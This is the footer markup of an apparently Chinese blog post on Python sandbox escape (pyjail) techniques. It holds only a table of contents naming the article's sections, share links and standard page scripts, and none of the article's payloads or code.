      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Pyjail%E5%9F%BA%E7%A1%80%E8%A7%A3%E6%B3%95%EF%BC%8Cpayload%E6%9E%84%E9%80%A0"><span class="toc-number">1.</span> <span class="toc-text">Pyjail基础解法，payload构造</span></a><ol class="toc-child"><li class="toc-item toc-level-6"><a class="toc-link" href="#%E5%9F%BA%E7%A1%80payload"><span class="toc-number">1.0.0.0.0.1.</span> <span class="toc-text">基础payload</span></a></li><li class="toc-item toc-level-6"><a class="toc-link" href="#%E5%85%B6%E4%BB%96%E7%9A%84%E5%8D%B1%E9%99%A9%E5%87%BD%E6%95%B0%E4%B8%BE%E4%BE%8B"><span class="toc-number">1.0.0.0.0.2.</span> <span class="toc-text">其他的危险函数举例</span></a></li><li class="toc-item toc-level-6"><a class="toc-link" href="#%E5%88%9B%E5%BB%BA%E5%AF%B9%E8%B1%A1%E6%9D%A5%E5%BC%95%E7%94%A8"><span class="toc-number">1.0.0.0.0.3.</span> <span class="toc-text">创建对象来引用</span></a></li><li class="toc-item toc-level-6"><a class="toc-link" href="#%E9%97%B4%E6%8E%A5%E5%BC%95%E7%94%A8"><span class="toc-number">1.0.0.0.0.4.</span> <span class="toc-text">间接引用</span></a></li></ol></li></ol></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Pyjail%E7%BB%95%E8%BF%87%E6%96%B9%E6%B3%95"><span class="toc-number">2.</span> <span class="toc-text">Pyjail绕过方法</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%9F%BA%E4%BA%8E%E9%95%BF%E5%BA%A6%E9%99%90%E5%88%B6%E7%9A%84%E7%BB%95%E8%BF%87"><span class="toc-number">2.1.</span> <span class="toc-text">基于长度限制的绕过</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#help"><span class="toc-number">2.2.</span> <span class="toc-text">help</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#breakpoint"><span class="toc-number">2.3.</span> <span class="toc-text">breakpoint()</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%A4%9A%E6%AC%A1%E4%BA%A4%E4%BA%92%E8%BF%9B%E8%A1%8C%E6%8B%BC%E6%8E%A5"><span class="toc-number">2.4.</span> <span class="toc-text">多次交互进行拼接</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%9F%BA%E4%BA%8E%E5%AD%97%E7%AC%A6%E4%B8%B2%E5%8C%B9%E9%85%8D%E8%BF%87%E6%BB%A4%E7%9A%84%E7%BB%95%E8%BF%87"><span class="toc-number">2.5.</span> <span class="toc-text">基于字符串匹配过滤的绕过</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%87%BD%E6%95%B0%E8%BF%94%E5%9B%9E"><span class="toc-number">2.6.</span> <span class="toc-text">函数返回</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%AD%97%E7%AC%A6%E4%B8%B2%E5%8F%96%E6%95%B4"><span class="toc-number">2.7.</span> <span class="toc-text">字符串取整</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#len-dict-list"><span class="toc-number">2.8.</span> <span class="toc-text">len+dict+list</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#bytes-type"><span class="toc-number">2.9.</span> <span class="toc-text">bytes&amp;type</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#getattr%E5%87%BD%E6%95%B0"><span class="toc-number">2.10.</span> <span class="toc-text">getattr函数</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%9F%BA%E4%BA%8E%E5%A4%9A%E8%A1%8C%E9%99%90%E5%88%B6%E7%9A%84%E7%BB%95%E8%BF%87"><span class="toc-number">3.</span> <span class="toc-text">基于多行限制的绕过</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#compile"><span class="toc-number">3.1.</span> <span class="toc-text">compile</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%B5%B7%E8%B1%A1%E8%A1%A8%E8%BE%BE%E5%BC%8F"><span class="toc-number">3.2.</span> <span class="toc-text">海象表达式</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%9F%BA%E4%BA%8E%E6%A8%A1%E5%9D%97%E5%88%A0%E9%99%A4%E7%BB%95%E8%BF%87"><span class="toc-number">3.3.</span> <span class="toc-text">基于模块删除绕过</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#unicode%E7%BB%95%E8%BF%87"><span class="toc-number">3.4.</span> <span class="toc-text">unicode绕过</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#input"><span class="toc-number">3.5.</span> <span class="toc-text">input</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%8E%B7%E5%8F%96%E5%85%A8%E5%B1%80%E5%8F%98%E9%87%8F%E7%9A%84%E6%96%B9%E6%B3%95"><span class="toc-number">3.6.</span> <span class="toc-text">获取全局变量的方法</span></a></li></ol></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://example.com/2025/05/09/python%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://example.com/2025/05/09/python%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8/&text=python沙箱逃逸"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://example.com/2025/05/09/python%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8/&title=python沙箱逃逸"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://example.com/2025/05/09/python%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8/&is_video=false&description=python沙箱逃逸"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=python沙箱逃逸&body=Check out this article: https://example.com/2025/05/09/python%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://example.com/2025/05/09/python%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8/&title=python沙箱逃逸"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://example.com/2025/05/09/python%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8/&title=python沙箱逃逸"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://example.com/2025/05/09/python%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8/&title=python沙箱逃逸"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://example.com/2025/05/09/python%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8/&title=python沙箱逃逸"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://example.com/2025/05/09/python%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8/&name=python沙箱逃逸&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://example.com/2025/05/09/python%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8/&t=python沙箱逃逸"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> 菜单</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> 目录</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> 分享</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> 返回顶部</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2016-2025
    YUNiversity
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">首页</a></li><!--
     --><!--
       --><li><a href="/archives/">文章</a></li><!--
     --><!--
       --><li><a href="/about/">关于</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="https://ayuniversity.github.io/links/">友链</a></li><!--
     --><!--
       --><li><a href="/search/">搜索</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"复制到粘贴板！\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "复制成功！");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

    <script type="text/javascript">
        var disqus_shortname = 'disqus_1dZQVxML7F';

        (function(){
            var dsq = document.createElement('script');
            dsq.type = 'text/javascript';
            dsq.async = true;
            dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
            (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
        }());
    </script>

<!-- utterances Comments -->


        <style>
            [bg-lazy] {
                background-image: none !important;
                background-color: #eee !important;
            }
        </style>
        <script>
            window.imageLazyLoadSetting = {
                isSPA: false,
                preloadRatio: 1,
                processImages: null,
            };
        </script><script>window.addEventListener("load",function(){var t=/\.(gif|jpg|jpeg|tiff|png)$/i,r=/^data:image\/[a-z\d\-\.\+]+;base64,/;Array.prototype.slice.call(document.querySelectorAll("img[data-original]")).forEach(function(a){var e=a.parentNode;"A"===e.tagName&&(t.test(e.href)||r.test(e.href))&&(e.href=a.dataset.original)})});</script><script>(r=>{r.imageLazyLoadSetting.processImages=t;var a=r.imageLazyLoadSetting.isSPA,o=r.imageLazyLoadSetting.preloadRatio||1,d=i();function i(){var t=Array.prototype.slice.call(document.querySelectorAll("img[data-original]")),e=Array.prototype.slice.call(document.querySelectorAll("[bg-lazy]"));return t.concat(e)}function t(t){(a||t)&&(d=i());for(var e,n=0;n<d.length;n++)0<=(e=(e=d[n]).getBoundingClientRect()).bottom&&0<=e.left&&e.top<=(r.innerHeight*o||document.documentElement.clientHeight*o)&&(()=>{var t,e,a,o,i=d[n];e=function(){d=d.filter(function(t){return i!==t}),r.imageLazyLoadSetting.onImageLoaded&&r.imageLazyLoadSetting.onImageLoaded(i)},(t=i).dataset.loaded||(t.hasAttribute("bg-lazy")?(t.removeAttribute("bg-lazy"),e&&e()):(a=new Image,o=t.getAttribute("data-original"),a.onload=function(){t.src=o,t.removeAttribute("data-original"),t.setAttribute("data-loaded",!0),e&&e()},a.onerror=function(){t.removeAttribute("data-original"),t.setAttribute("data-loaded",!1),t.src=o},t.src!==o&&(a.src=o)))})()}function e(){clearTimeout(t.tId),t.tId=setTimeout(t,500)}t(),document.addEventListener("scroll",e),r.addEventListener("resize",e),r.addEventListener("orientationchange",e)})(this);</script></body>
</html>
